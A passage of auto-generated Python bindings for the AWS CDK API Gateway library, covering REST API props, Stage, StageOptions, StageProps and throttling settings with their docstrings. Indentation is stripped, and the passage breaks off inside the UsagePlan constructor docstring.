@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def api_key_source_type(self) -> typing.Optional["ApiKeySourceType"]:
"""The source of the API key for metering requests according to a usage plan.
default
:default: - Metering is disabled.
"""
return self._values.get('api_key_source_type')
@property
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream".
default
:default: - RestApi supports only UTF-8-encoded text payloads.
"""
return self._values.get('binary_media_types')
@property
def clone_from(self) -> typing.Optional["IRestApi"]:
"""The ID of the API Gateway RestApi resource that you want to clone.
default
:default: - None.
"""
return self._values.get('clone_from')
@property
def cloud_watch_role(self) -> typing.Optional[bool]:
"""Automatically configure an AWS CloudWatch role for API Gateway.
default
:default: true
"""
return self._values.get('cloud_watch_role')
@property
def deploy(self) -> typing.Optional[bool]:
"""Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes.
Since API Gateway deployments are immutable, when this option is enabled
(the default), an AWS::ApiGateway::Deployment resource will automatically be
created with a logical ID that hashes the API model (methods, resources
and options). This means that when the model changes, the logical ID of
this CloudFormation resource will change, and a new deployment will be
created.
If this is set, ``latestDeployment`` will refer to the ``Deployment`` object
and ``deploymentStage`` will refer to a ``Stage`` that points to this
deployment. To customize the stage options, use the ``deployOptions``
property.
A CloudFormation Output will also be defined with the root URL endpoint
of this REST API.
default
:default: true
"""
return self._values.get('deploy')
@property
def deploy_options(self) -> typing.Optional["StageOptions"]:
"""Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled.
If ``deploy`` is disabled,
this value cannot be set.
default
:default: - Based on defaults of ``StageOptions``.
"""
return self._values.get('deploy_options')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of this API Gateway RestApi resource.
default
:default: - No description.
"""
return self._values.get('description')
@property
def domain_name(self) -> typing.Optional["DomainNameOptions"]:
"""Configure a custom domain name and map it to this API.
default
:default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
"""
return self._values.get('domain_name')
@property
def endpoint_export_name(self) -> typing.Optional[str]:
"""Export name for the CfnOutput containing the API endpoint.
default
:default: - when no export name is given, the output will be created without an export
"""
return self._values.get('endpoint_export_name')
@property
def endpoint_types(self) -> typing.Optional[typing.List["EndpointType"]]:
"""A list of the endpoint types of the API.
Use this property when creating
an API.
default
:default: - No endpoint types.
"""
return self._values.get('endpoint_types')
@property
def fail_on_warnings(self) -> typing.Optional[bool]:
"""Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource.
default
:default: false
"""
return self._values.get('fail_on_warnings')
@property
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API.
When compression is enabled, compression or
decompression is not applied on the payload if the payload size is
smaller than this value. Setting it to zero allows compression for any
payload size.
default
:default: - Compression is disabled.
"""
return self._values.get('minimum_compression_size')
@property
def parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""Custom header parameters for the request.
default
:default: - No parameters.
see
:see: https://docs.aws.amazon.com/cli/latest/reference/apigateway/import-rest-api.html
"""
return self._values.get('parameters')
@property
def policy(self) -> typing.Optional[aws_cdk.aws_iam.PolicyDocument]:
"""A policy document that contains the permissions for this RestApi.
default
:default: - No policy.
"""
return self._values.get('policy')
@property
def rest_api_name(self) -> typing.Optional[str]:
"""A name for the API Gateway RestApi resource.
default
:default: - ID of the RestApi construct.
"""
return self._values.get('rest_api_name')
@property
def retain_deployments(self) -> typing.Optional[bool]:
"""Retains old deployment resources when the API changes.
This allows
manually reverting stages to point to old deployments via the AWS
Console.
default
:default: false
"""
return self._values.get('retain_deployments')
@property
def handler(self) -> aws_cdk.aws_lambda.IFunction:
"""The default Lambda function that handles all requests from this API.
This handler will be used as the default integration for all methods in
this API, unless specified otherwise in ``addMethod``.
"""
return self._values.get('handler')
@property
def options(self) -> typing.Optional["RestApiProps"]:
"""
default
:default: - no options.
deprecated
:deprecated:
the ``LambdaRestApiProps`` now extends ``RestApiProps``, so all
options are just available here. Note that the options specified in
``options`` will be overridden by any props specified at the root level.
stability
:stability: deprecated
"""
return self._values.get('options')
@property
def proxy(self) -> typing.Optional[bool]:
"""If true, route all requests to the Lambda Function.
If set to false, you will need to explicitly define the API model using
``addResource`` and ``addMethod`` (or ``addProxy``).
default
:default: true
"""
return self._values.get('proxy')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'LambdaRestApiProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class Stage(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Stage"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, deployment: "Deployment", cache_cluster_enabled: typing.Optional[bool]=None, cache_cluster_size: typing.Optional[str]=None, client_certificate_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_options: typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]=None, stage_name: typing.Optional[str]=None, tracing_enabled: typing.Optional[bool]=None, variables: typing.Optional[typing.Mapping[str,str]]=None, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param deployment: The deployment that this stage points to [disable-awslint:ref-via-interface].
:param cache_cluster_enabled: Indicates whether cache clustering is enabled for the stage. Default: - Disabled for the stage.
:param cache_cluster_size: The stage's cache cluster size. Default: 0.5
:param client_certificate_id: The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage. Default: - None.
:param description: A description of the purpose of the stage. Default: - No description.
:param documentation_version: The version identifier of the API documentation snapshot. Default: - No documentation version.
:param method_options: Method deployment options for specific resources/methods. These will override common options defined in ``StageOptions#methodOptions``. Default: - Common options will be used.
:param stage_name: The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI). Default: - "prod"
:param tracing_enabled: Specifies whether Amazon X-Ray tracing is enabled for this method. Default: false
:param variables: A map that defines the stage variables. Variable names must consist of alphanumeric characters, and the values must match the following regular expression: [A-Za-z0-9-._~:/?#&=,]+. Default: - No stage variables.
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
"""
props = StageProps(deployment=deployment, cache_cluster_enabled=cache_cluster_enabled, cache_cluster_size=cache_cluster_size, client_certificate_id=client_certificate_id, description=description, documentation_version=documentation_version, method_options=method_options, stage_name=stage_name, tracing_enabled=tracing_enabled, variables=variables, cache_data_encrypted=cache_data_encrypted, cache_ttl=cache_ttl, caching_enabled=caching_enabled, data_trace_enabled=data_trace_enabled, logging_level=logging_level, metrics_enabled=metrics_enabled, throttling_burst_limit=throttling_burst_limit, throttling_rate_limit=throttling_rate_limit)
jsii.create(Stage, self, [scope, id, props])
@jsii.member(jsii_name="urlForPath")
def url_for_path(self, path: typing.Optional[str]=None) -> str:
"""Returns the invoke URL for a certain path.
:param path: The resource path.
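
Example (illustrative sketch; ``stage`` is an existing ``Stage``)::

    url = stage.url_for_path("/books")
    # e.g. https://<api-id>.execute-api.<region>.amazonaws.com/<stage-name>/books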
"""
return jsii.invoke(self, "urlForPath", [path])
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "IRestApi":
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "stageName")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.StageOptions", jsii_struct_bases=[MethodDeploymentOptions], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl': 'cacheTtl', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'client_certificate_id': 'clientCertificateId', 'description': 'description', 'documentation_version': 'documentationVersion', 'method_options': 'methodOptions', 'stage_name': 'stageName', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables'})
class StageOptions(MethodDeploymentOptions):
def __init__(self, *, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None, cache_cluster_enabled: typing.Optional[bool]=None, cache_cluster_size: typing.Optional[str]=None, client_certificate_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_options: typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]=None, stage_name: typing.Optional[str]=None, tracing_enabled: typing.Optional[bool]=None, variables: typing.Optional[typing.Mapping[str,str]]=None):
"""
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
:param cache_cluster_enabled: Indicates whether cache clustering is enabled for the stage. Default: - Disabled for the stage.
:param cache_cluster_size: The stage's cache cluster size. Default: 0.5
:param client_certificate_id: The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage. Default: - None.
:param description: A description of the purpose of the stage. Default: - No description.
:param documentation_version: The version identifier of the API documentation snapshot. Default: - No documentation version.
:param method_options: Method deployment options for specific resources/methods. These will override common options defined in ``StageOptions#methodOptions``. Default: - Common options will be used.
:param stage_name: The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI). Default: - "prod"
:param tracing_enabled: Specifies whether Amazon X-Ray tracing is enabled for this method. Default: false
:param variables: A map that defines the stage variables. Variable names must consist of alphanumeric characters, and the values must match the following regular expression: [A-Za-z0-9-._~:/?#&=,]+. Default: - No stage variables.
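
Example (a minimal sketch; assumes ``MethodLoggingLevel.INFO`` exists on the
enum and ``aws_cdk.core`` is imported as in this module)::

    opts = apigateway.StageOptions(
        stage_name="prod",
        cache_cluster_enabled=True,  # a cache cluster is required for caching
        caching_enabled=True,
        cache_ttl=aws_cdk.core.Duration.minutes(5),
        logging_level=apigateway.MethodLoggingLevel.INFO,
        throttling_rate_limit=100,
        throttling_burst_limit=200)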
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl is not None: self._values["cache_ttl"] = cache_ttl
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if method_options is not None: self._values["method_options"] = method_options
if stage_name is not None: self._values["stage_name"] = stage_name
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def cache_data_encrypted(self) -> typing.Optional[bool]:
"""Indicates whether the cached responses are encrypted.
default
:default: false
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Specifies the time to live (TTL), in seconds, for cached responses.
The
higher the TTL, the longer the response will be cached.
default
:default: Duration.minutes(5)
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html
"""
return self._values.get('cache_ttl')
@property
def caching_enabled(self) -> typing.Optional[bool]:
"""Specifies whether responses should be cached and returned for requests.
A
cache cluster must be enabled on the stage for responses to be cached.
default
:default: - Caching is Disabled.
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[bool]:
"""Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: false
"""
return self._values.get('data_trace_enabled')
@property
def logging_level(self) -> typing.Optional["MethodLoggingLevel"]:
"""Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: - Off
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon CloudWatch metrics are enabled for this method.
default
:default: false
"""
return self._values.get('metrics_enabled')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests.
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps).
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_rate_limit')
@property
def cache_cluster_enabled(self) -> typing.Optional[bool]:
"""Indicates whether cache clustering is enabled for the stage.
default
:default: - Disabled for the stage.
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""The stage's cache cluster size.
default
:default: 0.5
"""
return self._values.get('cache_cluster_size')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage.
default
:default: - None.
"""
return self._values.get('client_certificate_id')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the stage.
default
:default: - No description.
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""The version identifier of the API documentation snapshot.
default
:default: - No documentation version.
"""
return self._values.get('documentation_version')
@property
def method_options(self) -> typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]:
"""Method deployment options for specific resources/methods.
These will
override common options defined in ``StageOptions#methodOptions``.
default
:default: - Common options will be used.
"""
return self._values.get('method_options')
@property
def stage_name(self) -> typing.Optional[str]:
"""The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI).
default
:default: - "prod"
"""
return self._values.get('stage_name')
@property
def tracing_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon X-Ray tracing is enabled for this method.
default
:default: false
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map that defines the stage variables.
Variable names must consist of
alphanumeric characters, and the values must match the following regular
expression: [A-Za-z0-9-._~:/?#&=,]+.
default
:default: - No stage variables.
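
Example (illustrative sketch; variable names and values are hypothetical)::

    apigateway.StageOptions(
        variables={"lambdaAlias": "prod", "corsOrigin": "https://example.com"})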
"""
return self._values.get('variables')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.StageProps", jsii_struct_bases=[StageOptions], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl': 'cacheTtl', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'client_certificate_id': 'clientCertificateId', 'description': 'description', 'documentation_version': 'documentationVersion', 'method_options': 'methodOptions', 'stage_name': 'stageName', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables', 'deployment': 'deployment'})
class StageProps(StageOptions):
def __init__(self, *, cache_data_encrypted: typing.Optional[bool]=None, cache_ttl: typing.Optional[aws_cdk.core.Duration]=None, caching_enabled: typing.Optional[bool]=None, data_trace_enabled: typing.Optional[bool]=None, logging_level: typing.Optional["MethodLoggingLevel"]=None, metrics_enabled: typing.Optional[bool]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None, cache_cluster_enabled: typing.Optional[bool]=None, cache_cluster_size: typing.Optional[str]=None, client_certificate_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_options: typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]=None, stage_name: typing.Optional[str]=None, tracing_enabled: typing.Optional[bool]=None, variables: typing.Optional[typing.Mapping[str,str]]=None, deployment: "Deployment"):
"""
:param cache_data_encrypted: Indicates whether the cached responses are encrypted. Default: false
:param cache_ttl: Specifies the time to live (TTL), in seconds, for cached responses. The higher the TTL, the longer the response will be cached. Default: Duration.minutes(5)
:param caching_enabled: Specifies whether responses should be cached and returned for requests. A cache cluster must be enabled on the stage for responses to be cached. Default: - Caching is Disabled.
:param data_trace_enabled: Specifies whether data trace logging is enabled for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: false
:param logging_level: Specifies the logging level for this method, which affects the log entries pushed to Amazon CloudWatch Logs. Default: - Off
:param metrics_enabled: Specifies whether Amazon CloudWatch metrics are enabled for this method. Default: false
:param throttling_burst_limit: Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests. Default: - No additional restriction.
:param throttling_rate_limit: Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps). Default: - No additional restriction.
:param cache_cluster_enabled: Indicates whether cache clustering is enabled for the stage. Default: - Disabled for the stage.
:param cache_cluster_size: The stage's cache cluster size. Default: 0.5
:param client_certificate_id: The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage. Default: - None.
:param description: A description of the purpose of the stage. Default: - No description.
:param documentation_version: The version identifier of the API documentation snapshot. Default: - No documentation version.
:param method_options: Method deployment options for specific resources/methods. These will override common options defined in ``StageOptions#methodOptions``. Default: - Common options will be used.
:param stage_name: The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI). Default: - "prod"
:param tracing_enabled: Specifies whether Amazon X-Ray tracing is enabled for this method. Default: false
:param variables: A map that defines the stage variables. Variable names must consist of alphanumeric characters, and the values must match the following regular expression: [A-Za-z0-9-._~:/?#&=,]+. Default: - No stage variables.
:param deployment: The deployment that this stage points to [disable-awslint:ref-via-interface].
"""
self._values = {
'deployment': deployment,
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl is not None: self._values["cache_ttl"] = cache_ttl
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if method_options is not None: self._values["method_options"] = method_options
if stage_name is not None: self._values["stage_name"] = stage_name
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def cache_data_encrypted(self) -> typing.Optional[bool]:
"""Indicates whether the cached responses are encrypted.
default
:default: false
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Specifies the time to live (TTL), in seconds, for cached responses.
The
higher the TTL, the longer the response will be cached.
default
:default: Duration.minutes(5)
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-caching.html
"""
return self._values.get('cache_ttl')
@property
def caching_enabled(self) -> typing.Optional[bool]:
"""Specifies whether responses should be cached and returned for requests.
A
cache cluster must be enabled on the stage for responses to be cached.
default
:default: - Caching is Disabled.
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[bool]:
"""Specifies whether data trace logging is enabled for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: false
"""
return self._values.get('data_trace_enabled')
@property
def logging_level(self) -> typing.Optional["MethodLoggingLevel"]:
"""Specifies the logging level for this method, which effects the log entries pushed to Amazon CloudWatch Logs.
default
:default: - Off
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon CloudWatch metrics are enabled for this method.
default
:default: false
"""
return self._values.get('metrics_enabled')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling burst limit. The total rate of all requests in your AWS account is limited to 5,000 requests.
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""Specifies the throttling rate limit. The total rate of all requests in your AWS account is limited to 10,000 requests per second (rps).
default
:default: - No additional restriction.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
"""
return self._values.get('throttling_rate_limit')
@property
def cache_cluster_enabled(self) -> typing.Optional[bool]:
"""Indicates whether cache clustering is enabled for the stage.
default
:default: - Disabled for the stage.
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""The stage's cache cluster size.
default
:default: 0.5
"""
return self._values.get('cache_cluster_size')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""The identifier of the client certificate that API Gateway uses to call your integration endpoints in the stage.
default
:default: - None.
"""
return self._values.get('client_certificate_id')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the stage.
default
:default: - No description.
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""The version identifier of the API documentation snapshot.
default
:default: - No documentation version.
"""
return self._values.get('documentation_version')
@property
def method_options(self) -> typing.Optional[typing.Mapping[str,"MethodDeploymentOptions"]]:
"""Method deployment options for specific resources/methods.
These will
override common options defined in ``StageOptions#methodOptions``.
default
:default: - Common options will be used.
"""
return self._values.get('method_options')
@property
def stage_name(self) -> typing.Optional[str]:
"""The name of the stage, which API Gateway uses as the first path segment in the invoked Uniform Resource Identifier (URI).
default
:default: - "prod"
"""
return self._values.get('stage_name')
@property
def tracing_enabled(self) -> typing.Optional[bool]:
"""Specifies whether Amazon X-Ray tracing is enabled for this method.
default
:default: false
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map that defines the stage variables.
Variable names must consist of
alphanumeric characters, and the values must match the following regular
expression: [A-Za-z0-9-._~:/?#&=,]+.
default
:default: - No stage variables.
"""
return self._values.get('variables')
@property
def deployment(self) -> "Deployment":
"""The deployment that this stage points to [disable-awslint:ref-via-interface]."""
return self._values.get('deployment')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ThrottleSettings", jsii_struct_bases=[], name_mapping={'burst_limit': 'burstLimit', 'rate_limit': 'rateLimit'})
class ThrottleSettings():
def __init__(self, *, burst_limit: typing.Optional[jsii.Number]=None, rate_limit: typing.Optional[jsii.Number]=None):
"""Container for defining throttling parameters to API stages or methods.
:param burst_limit: The maximum API request rate limit over a period ranging from one to a few seconds. Default: none
:param rate_limit: The API request steady-state rate limit (average requests per second over an extended period of time). Default: none
link:
:link:: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-request-throttling.html
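
Example (illustrative sketch)::

    # Average of 10 requests per second with a burst capacity of 2 requests.
    throttle = apigateway.ThrottleSettings(rate_limit=10, burst_limit=2)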
"""
self._values = {
}
if burst_limit is not None: self._values["burst_limit"] = burst_limit
if rate_limit is not None: self._values["rate_limit"] = rate_limit
@property
def burst_limit(self) -> typing.Optional[jsii.Number]:
"""The maximum API request rate limit over a time ranging from one to a few seconds.
default
:default: none
"""
return self._values.get('burst_limit')
@property
def rate_limit(self) -> typing.Optional[jsii.Number]:
"""The API request steady-state rate limit (average requests per second over an extended period of time).
default
:default: none
"""
return self._values.get('rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ThrottleSettings(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ThrottlingPerMethod", jsii_struct_bases=[], name_mapping={'method': 'method', 'throttle': 'throttle'})
class ThrottlingPerMethod():
def __init__(self, *, method: "Method", throttle: "ThrottleSettings"):
"""Represents per-method throttling for a resource.
:param method: [disable-awslint:ref-via-interface] The method for which you specify the throttling settings. Default: none
:param throttle: Specifies the overall request rate (average requests per second) and burst capacity. Default: none
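
Example (illustrative sketch; ``get_books`` is a hypothetical ``Method``)::

    per_method = apigateway.ThrottlingPerMethod(
        method=get_books,
        throttle=apigateway.ThrottleSettings(rate_limit=5, burst_limit=1))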
"""
if isinstance(throttle, dict): throttle = ThrottleSettings(**throttle)
self._values = {
'method': method,
'throttle': throttle,
}
@property
def method(self) -> "Method":
"""[disable-awslint:ref-via-interface] The method for which you specify the throttling settings.
default
:default: none
"""
return self._values.get('method')
@property
def throttle(self) -> "ThrottleSettings":
"""Specifies the overall request rate (average requests per second) and burst capacity.
default
:default: none
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ThrottlingPerMethod(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class UsagePlan(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.UsagePlan"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key: typing.Optional["IApiKey"]=None, api_stages: typing.Optional[typing.List["UsagePlanPerApiStage"]]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, quota: typing.Optional["QuotaSettings"]=None, throttle: typing.Optional["ThrottleSettings"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api_key: ApiKey to be associated with the usage plan. Default: none
